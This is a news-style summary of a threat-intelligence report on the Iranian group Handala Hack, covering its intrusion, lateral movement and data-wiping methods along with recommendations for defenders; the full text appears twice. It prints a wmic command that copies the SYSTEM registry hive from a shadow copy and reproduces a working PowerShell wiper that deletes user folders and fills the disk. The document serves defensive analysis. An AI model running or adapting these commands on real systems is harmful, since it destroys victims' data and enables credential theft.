All about the simple but brutal scheme of the Handala group.
The Iranian group Handala Hack , linked to the Void Manticore cluster and the Iranian Ministry of Intelligence and Security, continues to operate using a rather brutal but simple strategy: gain access, quickly establish a foothold within the network, manually infiltrate the infrastructure, and launch several data destruction methods simultaneously. In a new analysis, researchers described not only the group's familiar set of tactics but also several new details. These include the use of NetBird to establish private tunnels within a compromised environment and a PowerShell wiper with signs of AI-assisted coding.
The Handala Hack identity doesn't represent a single, isolated campaign, but rather one of Void Manticore's public personas. This group also has other well-known personas: Karma and Homeland Justice. Homeland Justice has long been used in operations against Albania, including government agencies and the telecom sector. Handala, on the other hand, was primarily associated with attacks on Israeli organizations, but its geography is no longer limited to Israel. Researchers also specifically mention attacks on American companies, including the medical technology manufacturer Stryker.
According to the report, the group's techniques, tactics, and procedures—or TTPs—remained largely unchanged from 2024 to 2026. Void Manticore continues to rely on manual network manipulation, commercial and publicly available tools, ready-made wipers, publicly available file deletion and encryption utilities, and criminal services for initial access and acquisition of malicious tools. The key point here is that even without particularly exotic tactics, the group achieves significant disruption because it acts quickly, leverages privileged accounts, and attacks across multiple fronts.
Researchers believe that the Handala, Karma, and Homeland Justice actors are closely linked. Incidents attributed to these fronts shared not only common techniques but also sections of code in the wipers used. Karma and Homeland Justice also showed evidence of cooperation with another Iranian cluster, Scarred Manticore. In some cases, the pattern was particularly telling: messages within the infected environment and inscriptions left by the attackers pointed to Karma, and the stolen data was ultimately leaked through Handala. The authors suggest that Karma and Handala may have initially been two separate teams or two branches within a single organization, and then effectively merged under the more visible Handala brand. Karma's disappearance from the public eye and Handala's dominance in more recent operations indirectly support this.
According to publicly available data, Void Manticore overlaps with activity associated with the MOIS's internal security unit, specifically the counterterrorism unit led by Seyed Yahya Hosseini Panjaki. Researchers note that Panjaki, according to publicly available reports, died during the initial phase of Israeli strikes on Iran in early March 2026. This detail doesn't directly change the attack technique itself, but it helps better situate the cluster within the broader Iranian context.
Handala's initial access, according to the authors, often revolves around contractors, IT companies, and service providers. The logic is simple: through such an intermediary, it's possible to access multiple networks simultaneously. The group has long been hunting for credentials and is particularly active in exploiting compromised VPN accounts. In recent months, researchers have observed hundreds of login and password attempts against organizational VPN infrastructure, which they linked to Handala's infrastructure. These connections often went through commercial VPN nodes, and the source regularly used default Windows machine names like DESKTOP-XXXXXX or WIN-XXXXXX.
After the January internet shutdown in Iran, the picture changed slightly. Researchers observed similar activity from IP addresses attributed to Starlink, and note that this pattern persisted. At the same time, the group's operational discipline declined. While operators previously tried to hide traffic behind commercial VPNs and conceal its direct origin, more recent incidents began to feature direct connections from Iranian IP addresses. Previously, when the group targeted Israeli targets, it typically accessed the internet through the 169.150.227.X segment. Sometimes this obfuscation broke, and connections were still visible, either from Iranian addresses or from VPSs. After the war began, the researchers believe that maintaining this level of obfuscation became more difficult. In some cases, the attackers managed to exit through the Israeli node 146.185.219[.]235, which, according to the authors, was also connected to a VPN service, although it no longer coincided with the previous infrastructure.
A separate scenario is described in which network access, presumably used later in the destructive phase, emerged months before the actual attack. Researchers believe this early access allowed the attackers to gain a foothold, harvest the necessary credentials, and, most importantly, reach the Domain Admin level, that is, the Active Directory domain administrator. In the final hours before the destructive phase, Handala, according to their estimates, verified access functionality and tested authentication with the already stolen credentials.
Some of the pre-strike activity deviated slightly from the group's usual signature, so the authors cautiously note that not all steps can be attributed with complete certainty to Handala. However, this chain included actions typical of attack preparation: disabling Windows Defender protections, performing reconnaissance within the environment, stealing credentials, and attempting to retrieve additional payload from a separate command-and-control server at 107.189.19[.]52.
The attackers then moved on to extracting credentials using several methods. The report mentions a dump of the LSASS process via comsvcs.dll using rundll32.exe. LSASS is a Windows system process whose memory can contain credentials and other data useful for further network traversal. At the same time, the attackers exported sensitive registry keys, including HKLM. ADRecon was also launched under the name dra.ps1 within the infrastructure. This is a PowerShell framework for reconnaissance in Active Directory environments: it can be used to gather information about users, groups, trust relationships, computers, and administrator roles. It was at this stage, according to the researchers, that the attackers likely obtained Domain Admin privileges, which they then used in the Handala wipe operation.
The report also includes one of the observed command fragments used to copy data from the shadow copy of the disk:
wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public"
After gaining access and privileges, the group moved laterally across the network. Here, according to researchers, Handala still works primarily manually. The primary tool for moving between systems is RDP, or the standard Remote Desktop Protocol. Through it, operators log into compromised hosts and navigate the environment almost like a regular administrator. But if the desired machines couldn't be directly accessed from the outside, a more sophisticated tool—NetBird—came into play.
NetBird is a legitimate platform for building secure private mesh networks using a zero-trust model. Simply put, it allows you to connect machines so that access between them occurs through an encrypted tunnel and is not dependent on traditional line-of-sight. This is very convenient for an attacker: if one machine is already under their control, they can use this tool to extend their own private network and access other nodes. In this case, NetBird was installed manually. Operators connected to compromised systems via RDP, opened the default browser, and downloaded the client directly from the official NetBird website. After installing it on several machines within the network, they gained additional internal connectivity and were able to act more quickly. In one incident, researchers observed at least five different machines controlled by the attackers simultaneously operating within the environment.
The destructive phase was particularly brutal. To inflict maximum damage, the group deployed four different wipe techniques in parallel. This duplication isn't just for show. If one method doesn't work consistently or is partially stopped, the other will continue to destroy data. To distribute the different wipers across the network, the attackers used Group Policy, or Active Directory group policies. This is a very powerful tool in a corporate Windows environment: it allows for centralized distribution of scripts and tasks to multiple machines simultaneously.
The researchers dubbed the first component "Handala Wiper." In some cases, the file appeared as handala.exe. The wiper was distributed via a scheduled task created using logon scripts in Group Policy. The handala.bat script launched two components: an executable file and a PowerShell script. The researchers emphasized an interesting detail: the executable itself was launched remotely from the domain controller and was not written to the disk of the affected machines. This technique helps complicate detection and post-incident analysis. Inside the system, the malicious code overwrote file contents and also used wiping techniques via the master boot record (MBR). Damage to the MBR can render the system not only unusable but also significantly complicate recovery.
In the final stage, the operators launched another custom component—a PowerShell wiper. It was also distributed via Group Policy logon scripts and could therefore quickly spread across multiple machines. Its logic is simple but highly destructive: the script recursively enumerates files within user directories and deletes them. Researchers believe that, judging by the code structure and detailed comments, this PowerShell script was likely written using AI . Finally, the script also distributed the handala.gif image across logical drives to leave a visible visual signature of the attack.
Below is the full PowerShell code snippet that the researchers included in the report:
$usersFolder = C:\Users
# Ensure the folder exists
if (Test-Path $usersFolder) {
# Get all items in C:\Users, but not the Users folder itself
$items = Get-ChildItem -Path $usersFolder -Recurse
# Remove each item (files and subfolders) inside C:\Users
foreach ($item in $items) {
try {
Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
} catch {
Write-Host Could not delete: $($item.FullName)
}
}
}
$sourceFile = \\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar
$destinationFolder = C:\users
if (!(Test-Path $destinationFolder)) {
New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}
$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')
$i = 0
while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
Copy-Item $sourceFile $destinationFolder\Handala_$i.gif
$i++
}
In addition to their own wipers, the group also used legitimate software: VeraCrypt. VeraCrypt is typically known as a disk and container encryption tool used to protect data. In the Handala attack, it was used as an additional layer of destruction. The operator connected to the host via RDP, downloaded VeraCrypt from the official website through the default browser, and then encrypted the system drives. This is especially frustrating for the victim: even if some wipers fail to complete their work or are stopped somewhere, the encrypted drives may still remain inaccessible, greatly complicating recovery.
In some cases, the group didn't bother with the details at all and deleted data manually. Researchers observed instances where operators logged into machines via RDP, selected files, and simply deleted them. Similarly, they deleted virtual machines directly from the virtualization platform. This technique seems primitive, but given the privileges already gained and good control over the environment, it's quite effective. Moreover, the researchers observed similar behavior not only in the incidents themselves, but also in videos and leaked materials published by Handala itself.
The overall conclusion of the report is quite straightforward. Handala and the associated Void Manticore cluster don't rely on rare, high-tech tricks. Their model relies on fairly simple but effective steps: stolen credentials, rapid network entry, manual movement through the infrastructure, tunneling through legitimate tools, group policies for mass distribution, and several parallel data destruction methods. This is why defense against such operations remains largely classical: the more securely the basic access paths are closed and the sooner manual activity within the network is detected, the less likely the attackers are to reach the destructive phase.
In their recommendations for defenders, the researchers recommend primarily enabling multifactor authentication , especially for remote access and privileged accounts. Special attention should be paid to anomalous authentication: logins from countries where the organization has not previously operated, first logins at unusual times, chains of multiple failed attempts followed by successful logins, new device registrations, unusual data transfer volumes during VPN sessions, and authentication via new ASNs or hosting providers.
The authors also recommend restricting access from high-risk geographies and infrastructures. The report specifically recommends blocking incoming connections from Iran at the perimeter and on remote access services, unless there is a proven business need. Similar advice applies to Starlink bands, which, according to the researchers, were already being used by Iranian operators. If complete blocking is not possible, they recommend at least enabling conditional access, strengthening authentication requirements, and separately monitoring such bands.
Another important set of recommendations concerns RDP. It is recommended to limit it as much as possible, strengthen security, and disable it where it is truly needed. It is especially useful to search for RDP connections from machines that retain standard Windows names like DESKTOP-XXXXXX or WIN-XXXXXXXX, especially if such sessions are initiated outside of working hours. Finally, it is worth monitoring the use of potentially unwanted software: remote administration and monitoring systems, VPN clients like NetBird, and tunneling utilities, including SSH for Windows.
The Handala story illustrates an unpleasant but important point: a major disruptive incident doesn't always require a sophisticated, next-generation implant. Sometimes, stolen VPN access, domain administrator privileges, a remote desktop, a couple of legitimate utilities, and a group of operators willing to quickly traverse the network manually are all that's needed. This is precisely why such campaigns are dangerous not only for high-profile political targets but also for ordinary companies whose basic remote access and internal administration practices are still based on old assumptions.
The Iranian group Handala Hack , linked to the Void Manticore cluster and the Iranian Ministry of Intelligence and Security, continues to operate using a rather brutal but simple strategy: gain access, quickly establish a foothold within the network, manually infiltrate the infrastructure, and launch several data destruction methods simultaneously. In a new analysis, researchers described not only the group's familiar set of tactics but also several new details. These include the use of NetBird to establish private tunnels within a compromised environment and a PowerShell wiper with signs of AI-assisted coding.
The Handala Hack identity doesn't represent a single, isolated campaign, but rather one of Void Manticore's public personas. This group also has other well-known personas: Karma and Homeland Justice. Homeland Justice has long been used in operations against Albania, including government agencies and the telecom sector. Handala, on the other hand, was primarily associated with attacks on Israeli organizations, but its geography is no longer limited to Israel. Researchers also specifically mention attacks on American companies, including the medical technology manufacturer Stryker.
According to the report, the group's techniques, tactics, and procedures—or TTPs—remained largely unchanged from 2024 to 2026. Void Manticore continues to rely on manual network manipulation, commercial and publicly available tools, ready-made wipers, publicly available file deletion and encryption utilities, and criminal services for initial access and acquisition of malicious tools. The key point here is that even without particularly exotic tactics, the group achieves significant disruption because it acts quickly, leverages privileged accounts, and attacks across multiple fronts.
Researchers believe that the Handala, Karma, and Homeland Justice actors are closely linked. Incidents attributed to these fronts shared not only common techniques but also sections of code in the wipers used. Karma and Homeland Justice also showed evidence of cooperation with another Iranian cluster, Scarred Manticore. In some cases, the pattern was particularly telling: messages within the infected environment and inscriptions left by the attackers pointed to Karma, and the stolen data was ultimately leaked through Handala. The authors suggest that Karma and Handala may have initially been two separate teams or two branches within a single organization, and then effectively merged under the more visible Handala brand. Karma's disappearance from the public eye and Handala's dominance in more recent operations indirectly support this.
According to publicly available data, Void Manticore overlaps with activity associated with the MOIS's internal security unit, specifically the counterterrorism unit led by Seyed Yahya Hosseini Panjaki. Researchers note that Panjaki, according to publicly available reports, died during the initial phase of Israeli strikes on Iran in early March 2026. This detail doesn't directly change the attack technique itself, but it helps better situate the cluster within the broader Iranian context.
Handala's initial access, according to the authors, often revolves around contractors, IT companies, and service providers. The logic is simple: through such an intermediary, it's possible to access multiple networks simultaneously. The group has long been hunting for credentials and is particularly active in exploiting compromised VPN accounts. In recent months, researchers have observed hundreds of login and password attempts against organizational VPN infrastructure, which they linked to Handala's infrastructure. These connections often went through commercial VPN nodes, and the source regularly used default Windows machine names like DESKTOP-XXXXXX or WIN-XXXXXX.
After the January internet shutdown in Iran, the picture changed slightly. Researchers observed similar activity from IP addresses attributed to Starlink, and note that this pattern persisted. At the same time, the group's operational discipline declined. While operators previously tried to hide traffic behind commercial VPNs and conceal its direct origin, more recent incidents began to feature direct connections from Iranian IP addresses. Previously, when the group targeted Israeli targets, it typically accessed the internet through the 169.150.227.X segment. Sometimes this obfuscation broke, and connections were still visible, either from Iranian addresses or from VPSs. After the war began, the researchers believe that maintaining this level of obfuscation became more difficult. In some cases, the attackers managed to exit through the Israeli node 146.185.219[.]235, which, according to the authors, was also connected to a VPN service, although it no longer coincided with the previous infrastructure.
A separate scenario is described in which network access, presumably used later in the destructive phase, emerged months before the actual attack. Researchers believe this early access allowed the attackers to gain a foothold, harvest the necessary credentials, and, most importantly, reach the Domain Admin level, that is, the Active Directory domain administrator. In the final hours before the destructive phase, Handala, according to their estimates, verified access functionality and tested authentication with the already stolen credentials.
Some of the pre-strike activity deviated slightly from the group's usual signature, so the authors cautiously note that not all steps can be attributed with complete certainty to Handala. However, this chain included actions typical of attack preparation: disabling Windows Defender protections, performing reconnaissance within the environment, stealing credentials, and attempting to retrieve additional payload from a separate command-and-control server at 107.189.19[.]52.
The attackers then moved on to extracting credentials using several methods. The report mentions a dump of the LSASS process via comsvcs.dll using rundll32.exe. LSASS is a Windows system process whose memory can contain credentials and other data useful for further network traversal. At the same time, the attackers exported sensitive registry keys, including HKLM. ADRecon was also launched under the name dra.ps1 within the infrastructure. This is a PowerShell framework for reconnaissance in Active Directory environments: it can be used to gather information about users, groups, trust relationships, computers, and administrator roles. It was at this stage, according to the researchers, that the attackers likely obtained Domain Admin privileges, which they then used in the Handala wipe operation.
The report also includes one of the observed command fragments used to copy data from the shadow copy of the disk:
wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system c:\users\public"
After gaining access and privileges, the group moved laterally across the network. Here, according to researchers, Handala still works primarily manually. The primary tool for moving between systems is RDP, or the standard Remote Desktop Protocol. Through it, operators log into compromised hosts and navigate the environment almost like a regular administrator. But if the desired machines couldn't be directly accessed from the outside, a more sophisticated tool—NetBird—came into play.
NetBird is a legitimate platform for building secure private mesh networks using a zero-trust model. Simply put, it allows you to connect machines so that access between them occurs through an encrypted tunnel and is not dependent on traditional line-of-sight. This is very convenient for an attacker: if one machine is already under their control, they can use this tool to extend their own private network and access other nodes. In this case, NetBird was installed manually. Operators connected to compromised systems via RDP, opened the default browser, and downloaded the client directly from the official NetBird website. After installing it on several machines within the network, they gained additional internal connectivity and were able to act more quickly. In one incident, researchers observed at least five different machines controlled by the attackers simultaneously operating within the environment.
The destructive phase was particularly brutal. To inflict maximum damage, the group deployed four different wipe techniques in parallel. This duplication isn't just for show. If one method doesn't work consistently or is partially stopped, the other will continue to destroy data. To distribute the different wipers across the network, the attackers used Group Policy, or Active Directory group policies. This is a very powerful tool in a corporate Windows environment: it allows for centralized distribution of scripts and tasks to multiple machines simultaneously.
The researchers dubbed the first component "Handala Wiper." In some cases, the file appeared as handala.exe. The wiper was distributed via a scheduled task created using logon scripts in Group Policy. The handala.bat script launched two components: an executable file and a PowerShell script. The researchers emphasized an interesting detail: the executable itself was launched remotely from the domain controller and was not written to the disk of the affected machines. This technique helps complicate detection and post-incident analysis. Inside the system, the malicious code overwrote file contents and also used wiping techniques via the master boot record (MBR). Damage to the MBR can render the system not only unusable but also significantly complicate recovery.
In the final stage, the operators launched another custom component—a PowerShell wiper. It was also distributed via Group Policy logon scripts and could therefore quickly spread across multiple machines. Its logic is simple but highly destructive: the script recursively enumerates files within user directories and deletes them. Researchers believe that, judging by the code structure and detailed comments, this PowerShell script was likely written using AI . Finally, the script also distributed the handala.gif image across logical drives to leave a visible visual signature of the attack.
Below is the full PowerShell code snippet that the researchers included in the report:
$usersFolder = C:\Users
# Ensure the folder exists
if (Test-Path $usersFolder) {
# Get all items in C:\Users, but not the Users folder itself
$items = Get-ChildItem -Path $usersFolder -Recurse
# Remove each item (files and subfolders) inside C:\Users
foreach ($item in $items) {
try {
Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
} catch {
Write-Host Could not delete: $($item.FullName)
}
}
}
$sourceFile = \\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar
$destinationFolder = C:\users
if (!(Test-Path $destinationFolder)) {
New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}
$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')
$i = 0
while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
Copy-Item $sourceFile $destinationFolder\Handala_$i.gif
$i++
}
In addition to their own wipers, the group also used legitimate software: VeraCrypt. VeraCrypt is typically known as a disk and container encryption tool used to protect data. In the Handala attack, it was used as an additional layer of destruction. The operator connected to the host via RDP, downloaded VeraCrypt from the official website through the default browser, and then encrypted the system drives. This is especially frustrating for the victim: even if some wipers fail to complete their work or are stopped somewhere, the encrypted drives may still remain inaccessible, greatly complicating recovery.
In some cases, the group didn't bother with the details at all and deleted data manually. Researchers observed instances where operators logged into machines via RDP, selected files, and simply deleted them. Similarly, they deleted virtual machines directly from the virtualization platform. This technique seems primitive, but given the privileges already gained and good control over the environment, it's quite effective. Moreover, the researchers observed similar behavior not only in the incidents themselves, but also in videos and leaked materials published by Handala itself.
The overall conclusion of the report is quite straightforward. Handala and the associated Void Manticore cluster don't rely on rare, high-tech tricks. Their model relies on fairly simple but effective steps: stolen credentials, rapid network entry, manual movement through the infrastructure, tunneling through legitimate tools, group policies for mass distribution, and several parallel data destruction methods. This is why defense against such operations remains largely classical: the more securely the basic access paths are closed and the sooner manual activity within the network is detected, the less likely the attackers are to reach the destructive phase.
In their recommendations for defenders, the researchers recommend primarily enabling multifactor authentication , especially for remote access and privileged accounts. Special attention should be paid to anomalous authentication: logins from countries where the organization has not previously operated, first logins at unusual times, chains of multiple failed attempts followed by successful logins, new device registrations, unusual data transfer volumes during VPN sessions, and authentication via new ASNs or hosting providers.
The authors also recommend restricting access from high-risk geographies and infrastructures. The report specifically recommends blocking incoming connections from Iran at the perimeter and on remote access services, unless there is a proven business need. Similar advice applies to Starlink bands, which, according to the researchers, were already being used by Iranian operators. If complete blocking is not possible, they recommend at least enabling conditional access, strengthening authentication requirements, and separately monitoring such bands.
Another important set of recommendations concerns RDP. It is recommended to limit it as much as possible, strengthen security, and disable it where it is truly needed. It is especially useful to search for RDP connections from machines that retain standard Windows names like DESKTOP-XXXXXX or WIN-XXXXXXXX, especially if such sessions are initiated outside of working hours. Finally, it is worth monitoring the use of potentially unwanted software: remote administration and monitoring systems, VPN clients like NetBird, and tunneling utilities, including SSH for Windows.
The Handala story illustrates an unpleasant but important point: a major disruptive incident doesn't always require a sophisticated, next-generation implant. Sometimes, stolen VPN access, domain administrator privileges, a remote desktop, a couple of legitimate utilities, and a group of operators willing to quickly traverse the network manually are all that's needed. This is precisely why such campaigns are dangerous not only for high-profile political targets but also for ordinary companies whose basic remote access and internal administration practices are still based on old assumptions.
